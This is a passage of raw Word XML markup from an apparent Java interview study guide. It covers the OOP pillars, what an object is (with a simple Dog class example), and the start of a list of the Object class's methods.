      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E42F9" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Encapsulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDC3010" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bundling of data (variables) and methods into a single unit (class).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C94FA" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Achieved using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>access modifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (private, public, protected).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C1961" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4680EB" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Allows a class (child) to inherit fields and methods from another class (parent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC99AD" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Promotes code reusability and method overriding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483067AD" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Polymorphism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04062BEC" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>One entity behaves differently based on context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFA890" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Compile-time (method overloading)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Run-time (method overriding)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the two types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0594B" w14:textId="2BE9A200" w:rsidR="003F6A1C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002465FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2FB0C7B1">
          <v:rect id="_x0000_i1296" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6882A67A" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc196307588"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is an object?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="7F5C7DE8" w14:textId="34E19437" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911" w:rsidP="0086711B">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance of a class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A572459" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-world entity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A1B1D" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911" w:rsidP="0086711B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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e (attributes/fields):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> e.g., name, age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308EE487" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911" w:rsidP="0086711B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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havior (methods/functions):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> e.g., walk(), sleep()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1E356" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911" w:rsidP="0086711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18DB4159" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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Dog {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E66A469" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BE2903" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44381BE6" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911" w:rsidP="0086711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37932F28" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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bark() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2484DAE3" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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name + " is barking");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CE09A3" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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6547D84" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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2601FDA" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911" w:rsidP="0086711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB29B14" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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2AF4208A" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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7291298B" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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og d1 = new Dog(); // Object created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3AA6A" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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1.name = "Bruno";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD7428" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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1.age = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBDFF97" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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1.bark(); // Bruno is barking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D03349F" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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F069FC3" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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C2BDA2D" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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ere, d1 is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the class Dog. It holds its own </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (name, age) and can perform actions (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like bark()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595DBE1F" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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et me know if you want object memory structure, how it's stored in heap, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5416F8E1" w14:textId="6D93691F" w:rsidR="00B729A5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B729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65F470AC">
          <v:rect id="_x0000_i1297" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FFE7F8" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc196307589"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain method in Object class? Explain 9 methods in Object class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="754411F7" w14:textId="577DEB9A" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76DA">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the Object class is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent class of all classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Every class in Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>implicitly inherits</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from it, unless it explicitly extends another class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F72344E" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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Object class is defined in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>several important methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that every Java object inherits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F089C" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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y Object class methods are important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A018B" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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y allow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA062B" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Comparing objects (equals)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB5CD6" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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etting hash codes (hashCode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2566F1" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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etting class info (getClass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB064B" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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verting object to String (toString)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D1D74" w14:textId="77777777" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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read communication (wait, notify, etc.)</w:t>
      </w:r>
    </w:p>
